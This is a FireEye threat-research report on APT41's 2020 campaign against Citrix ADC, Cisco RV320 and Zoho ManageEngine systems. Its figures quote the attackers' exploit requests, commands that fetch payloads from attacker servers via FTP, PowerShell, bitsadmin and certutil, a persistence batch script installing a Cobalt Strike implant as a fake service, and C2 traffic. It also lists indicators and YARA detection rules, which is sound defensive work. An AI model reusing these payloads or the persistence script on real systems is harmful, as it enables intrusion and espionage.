This Is Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits

2020-03-25T00:00:00

Description

Beginning this year, FireEye observed Chinese actor APT41 carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in [Citrix NetScaler/ADC](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), Cisco routers, and [Zoho ManageEngine Desktop Central](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) at over 75 FireEye customers. Countries we’ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. It’s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature. #### Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC]) Starting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>) (published December 17, 2019). ![](https://www.fireeye.com/sites/default/files/styles/large/public/2021-09/apt41-timeline-blog-v2.png?itok=342XZQnP) Figure 1: Timeline of key events The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the [mitigation](<https://support.citrix.com/article/CTX267679>) wasn’t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step. One interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet. POST /vpns/portal/scripts/newbm.pl HTTP/1.1 Host: [redacted] Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: python-requests/2.22.0 NSC_NONCE: nsroot NSC_USER: ../../../netscaler/portal/templates/[redacted] Content-Length: 96 url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %] --- Figure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781 There is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays which occurred between January 24 and January 30, 2020. This has been a common activity pattern by Chinese APT groups in past years as well. Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown payload named ‘bsd’ (which was likely a backdoor). POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 Accept-Encoding: identity Content-Length: 147 Connection: close Nsc_User: ../../../netscaler/portal/templates/[redacted] User-Agent: Python-urllib/2.7 Nsc_Nonce: nsroot Host: [redacted] Content-Type: application/x-www-form-urlencoded url=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = '**print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\@66.42.98[.]220/bsd**`') %] --- Figure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781 We did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was almost identical to the activity on February 1, where only the name of the payload ‘un’ changed. POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 Accept-Encoding: identity Content-Length: 145 Connection: close Nsc_User: ../../../netscaler/portal/templates/[redacted] User-Agent: Python-urllib/2.7 Nsc_Nonce: nsroot Host: [redacted] Content-Type: application/x-www-form-urlencoded url=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = '**print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un**`') %] --- Figure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781 Citrix released a [mitigation](<https://support.citrix.com/article/CTX267027>) for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP. #### Cisco Router Exploitation On February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE’s ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers and uses wget to download the specified payload. GET /test/fuc HTTP/1.1 Host: 66.42.98\\.220 User-Agent: Wget Connection: close --- Figure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget 66.42.98[.]220 also hosted a file name http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5: c0c467c8e9b2046d7053642cc9bdd57d) is ‘cat /etc/flash/etc/nk_sysconfig’, which is the command one would execute on a Cisco RV320 router to display the current configuration. Cisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the following security advisories and take appropriate action: * [Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>) * [Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>) #### Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability) On March 5, 2020, researcher [Steven Seeley](<https://twitter.com/steventseeley/status/1235635108498948096?s=20>), published [an advisory](<https://srcincite.io/advisories/src-2020-0011/>) and released [proof-of-concept code](<https://srcincite.io/pocs/src-2020-0011.py.txt>) for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 ([CVE-2020-10189)](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll. java/lang/Runtime getRuntime ()Ljava/lang/Runtime; Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\ Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll',' C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat '(Ljava/lang/String;)Ljava/lang/Process; StackMapTable ysoserial/Pwner76328858520609 Lysoserial/Pwner76328858520609; --- Figure 6: Contents of logger.zip Here we see a toolmark from the tool [ysoserial](<https://github.com/frohoff/ysoserial>) that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation. In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345. Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat --- Figure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation In both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f). @echo off set "WORK_DIR=C:\Windows\System32" set "DLL_NAME=storesyncsvc.dll" set "SERVICE_NAME=StorSyncSvc" set "DISPLAY_NAME=Storage Sync Service" set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly." sc stop %SERVICE_NAME% sc delete %SERVICE_NAME% mkdir %WORK_DIR% copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%" SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000 sc description "%SERVICE_NAME%" "%DESCRIPTION%" reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f net start "%SERVICE_NAME%" --- Figure 8: Contents of install.bat Storesyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile. GET /jquery-3.3.1.min.js HTTP/1.1 Host: cdn.bootcss.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: http://cdn.bootcss.com/ Accept-Encoding: gzip, deflate Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM DA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko Connection: Keep-Alive Cache-Control: no-cache --- Figure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request Within a few hours of initial exploitation, APT41 used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address that uses Microsoft CertUtil, a common TTP that we’ve observed APT41 use in past intrusions, which they then used to download 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The usage of VMProtected binaries is another very common TTP that we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit. GET /2.exe HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Accept: */* User-Agent: Microsoft-CryptoAPI/6.3 Host: 91.208.184[.]78 --- Figure 10: Example HTTP request downloading ‘2.exe’ VMProtected Meterpreter downloader via CertUtil certutil -urlcache -split -f http://91.208.184[.]78/2.exe --- Figure 11: Example CertUtil command to download ‘2.exe’ VMProtected Meterpreter downloader The Meterpreter downloader ‘TzGG’ was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version). GET /TzGG HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0) Host: 91.208.184[.]78:443 Connection: Keep-Alive Cache-Control: no-cache --- Figure 12: Example HTTP request downloading ‘TzGG’ shellcode for Cobalt Strike BEACON The downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems. ManageEngine released a short term [mitigation](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) for CVE-2020-10189 on January 20, 2020, and subsequently released an [update](<https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html?utm_source=rce-kb>) on March 7, 2020, with a long term fix. #### Outlook This activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation _has focused on a subset of our customers_, and seems to reveal a high operational tempo and wide collection requirements for APT41. It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage. Previously, FireEye Mandiant Managed Defense identified APT41 successfully leverage CVE-2019-3396 (Atlassian Confluence) against a U.S. based university. While APT41 is a unique state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain. #### Indicators Type | Indicator(s) ---|--- CVE-2019-19781 Exploitation (Citrix Application Delivery Control) | 66.42.98[.]220 CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’ CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/bsd’ CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\@66.42.98[.]220/un’ /tmp/bsd /tmp/un Cisco Router Exploitation | 66.42.98\\.220 ‘1.txt’ (MD5: c0c467c8e9b2046d7053642cc9bdd57d) ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc CVE-2020-10189 (Zoho ManageEngine Desktop Central) | 66.42.98[.]220 91.208.184[.]78 74.82.201[.]8 exchange.dumb1[.]com install.bat (MD5: 7966c2c546b71e800397a67f942858d0) storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f) C:\Windows\Temp\storesyncsvc.dll C:\Windows\Temp\install.bat 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c) C:\Users\\[redacted]\install.bat TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9) C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78 PowerShell downloading files with Net.WebClient #### Detecting the Techniques FireEye detects this activity across our platforms. This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring. Platform | Signature Name ---|--- Endpoint Security | BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY) CERTUTIL.EXE DOWNLOADER A (UTILITY) Generic.mg.5909983db4d9023e Generic.mg.3e856162c36b5329 POWERSHELL DOWNLOADER (METHODOLOGY) SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY) SAMWELL (BACKDOOR) SUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT) Network Security | Backdoor.Meterpreter DTI.Callback Exploit.CitrixNetScaler Trojan.METASTAGE Exploit.ZohoManageEngine.CVE-2020-10198.Pwner Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader Helix | CITRIX ADC [Suspicious Commands] EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt] EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success] EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access] EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning] MALWARE METHODOLOGY [Certutil User-Agent] WINDOWS METHODOLOGY [BITSadmin Transfer] WINDOWS METHODOLOGY [Certutil Downloader] #### MITRE ATT&CK Technique Mapping ATT&CK | Techniques ---|--- Initial Access | External Remote Services (T1133), Exploit Public-Facing Application (T1190) Execution | PowerShell (T1086), Scripting (T1064) Persistence | New Service (T1050) Privilege Escalation | Exploitation for Privilege Escalation (T1068) Defense Evasion | BITS Jobs (T1197), Process Injection (T1055) Command And Control | Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071) #### Appendix A: Discovery Rules The following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Some of these rules are broad in aperture that build larger haystacks for further automation or processing in threat hunting systems. import "pe" rule ExportEngine_APT41_Loader_String { meta: author = "@stvemillertime" description "This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll" strings: $pcre = /loader_[\x00-\x7F]{1,}\x00/ condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12)) } rule ExportEngine_ShortName { meta: author = "@stvemillertime" description = "This looks for Win PEs where Export DLL name is a single character" strings: $pcre = /[A-Za-z0-9]{1}\\.(dll|exe|dat|bin|sys)/ condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12)) } rule ExportEngine_xArch { meta: author = "@stvemillertime" description = "This looks for Win PEs where Export DLL name is a something like x32.dat" strings: $pcre = /[\x00-\x7F]{1,}x(32|64|86)\\.dat\x00/ condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12)) } rule RareEquities_LibTomCrypt { meta: author = "@stvemillertime" description = "This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples." strings: $a1 = "LibTomMath" condition: uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1 } rule RareEquities_KCP { meta: author = "@stvemillertime" description = "This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability." strings: $a01 = "[RO] %ld bytes" $a02 = "recv sn=%lu" $a03 = "[RI] %d bytes" $a04 = "input ack: sn=%lu rtt=%ld rto=%ld" $a05 = "input psh: sn=%lu ts=%lu" $a06 = "input probe" $a07 = "input wins: %lu" $a08 = "rcv_nxt=%lu\\\n" $a09 = "snd(buf=%d, queue=%d)\\\n" $a10 = "rcv(buf=%d, queue=%d)\\\n" $a11 = "rcvbuf" condition: (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 5MB and 3 of ($a*) } rule ConventionEngine_Term_Users { meta: author = "@stvemillertime" description = "Searching for PE files with PDB path keywords, terms or anomalies." sample_md5 = "09e4e6fa85b802c46bc121fcaecc5666" ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html" strings: $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\\\[\x00-\xFF]{0,200}Users[\x00-\xFF]{0,200}\\.pdb\x00/ nocase ascii condition: (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre } rule ConventionEngine_Term_Desktop { meta: author = "@stvemillertime" description = "Searching for PE files with PDB path keywords, terms or anomalies." sample_md5 = "71cdba3859ca8bd03c1e996a790c04f9" ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html" strings: $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\\\[\x00-\xFF]{0,200}Desktop[\x00-\xFF]{0,200}\\.pdb\x00/ nocase ascii condition: (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre } rule ConventionEngine_Anomaly_MultiPDB_Double { meta: author = "@stvemillertime" description = "Searching for PE files with PDB path keywords, terms or anomalies." sample_md5 = "013f3bde3f1022b6cf3f2e541d19353c" ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html" strings: $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\\\[\x00-\xFF]{0,200}\\.pdb\x00/ condition: (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2 } ---

{"id": "FIREEYE:BFB36D22F20651C632D25AA20588E904", "type": "fireeye", "bulletinFamily": "info", "title": "This Is\u00a0Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits", "description": "Beginning this year, FireEye observed Chinese actor APT41 carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in [Citrix NetScaler/ADC](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), Cisco routers, and [Zoho ManageEngine Desktop Central](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) at over 75 FireEye customers. Countries we\u2019ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. It\u2019s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.\n\n#### Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])\n\nStarting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>) (published December 17, 2019).\n\n![](https://www.fireeye.com/sites/default/files/styles/large/public/2021-09/apt41-timeline-blog-v2.png?itok=342XZQnP)\n\n \nFigure 1: Timeline of key events\n\nThe initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command \u2018file /bin/pwd\u2019, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the [mitigation](<https://support.citrix.com/article/CTX267679>) wasn\u2019t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step. \n\nOne interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.\n\nPOST /vpns/portal/scripts/newbm.pl HTTP/1.1 \nHost: [redacted] \nConnection: close \nAccept-Encoding: gzip, deflate \nAccept: */* \nUser-Agent: python-requests/2.22.0 \nNSC_NONCE: nsroot \nNSC_USER: ../../../netscaler/portal/templates/[redacted] \nContent-Length: 96 \n \nurl=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %] \n \n--- \n \nFigure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nThere is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays which occurred between January 24 and January 30, 2020. This has been a common activity pattern by Chinese APT groups in past years as well.\n\nStarting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command \u2018/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd\u2019, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of \u2018test\u2019 and a password that we have redacted, and then downloaded an unknown payload named \u2018bsd\u2019 (which was likely a backdoor).\n\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 \nAccept-Encoding: identity \nContent-Length: 147 \nConnection: close \nNsc_User: ../../../netscaler/portal/templates/[redacted] \nUser-Agent: Python-urllib/2.7 \nNsc_Nonce: nsroot \nHost: [redacted] \nContent-Type: application/x-www-form-urlencoded \n \nurl=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = '**print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd**`') %] \n \n--- \n \nFigure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nWe did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was almost identical to the activity on February 1, where only the name of the payload \u2018un\u2019 changed.\n\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 \nAccept-Encoding: identity \nContent-Length: 145 \nConnection: close \nNsc_User: ../../../netscaler/portal/templates/[redacted] \nUser-Agent: Python-urllib/2.7 \nNsc_Nonce: nsroot \nHost: [redacted] \nContent-Type: application/x-www-form-urlencoded \n \nurl=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = '**print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\\@66.42.98[.]220/un**`') %] \n \n--- \n \nFigure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nCitrix released a [mitigation](<https://support.citrix.com/article/CTX267027>) for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.\n\n#### Cisco Router Exploitation\n\nOn February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named \u2018fuc\u2019 (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE\u2019s ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers and uses wget to download the specified payload.\n\nGET /test/fuc \nHTTP/1.1 \nHost: 66.42.98\\\\.220 \nUser-Agent: Wget \nConnection: close \n \n--- \n \nFigure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget\n\n66.42.98[.]220 also hosted a file name http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5: c0c467c8e9b2046d7053642cc9bdd57d) is \u2018cat /etc/flash/etc/nk_sysconfig\u2019, which is the command one would execute on a Cisco RV320 router to display the current configuration.\n\nCisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the following security advisories and take appropriate action:\n\n * [Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)\n * [Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>)\n\n#### Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)\n\nOn March 5, 2020, researcher [Steven Seeley](<https://twitter.com/steventseeley/status/1235635108498948096?s=20>), published [an advisory](<https://srcincite.io/advisories/src-2020-0011/>) and released [proof-of-concept code](<https://srcincite.io/pocs/src-2020-0011.py.txt>) for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 ([CVE-2020-10189)](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload \u201clogger.zip\u201d, a simple Java based program, which contained a set of commands to use PowerShell to download and execute install.bat and storesyncsvc.dll.\n\njava/lang/Runtime\n\ngetRuntime\n\n()Ljava/lang/Runtime;\n\nXcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\\ \nWindows\\Temp\\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll',' \nC:\\Windows\\Temp\\storesyncsvc.dll')&C:\\Windows\\Temp\\install.bat\n\n'(Ljava/lang/String;)Ljava/lang/Process;\n\nStackMapTable\n\nysoserial/Pwner76328858520609\n\nLysoserial/Pwner76328858520609; \n \n--- \n \nFigure 6: Contents of logger.zip\n\nHere we see a toolmark from the tool [ysoserial](<https://github.com/frohoff/ysoserial>) that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation.\n\nIn the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.\n\nParent Process: 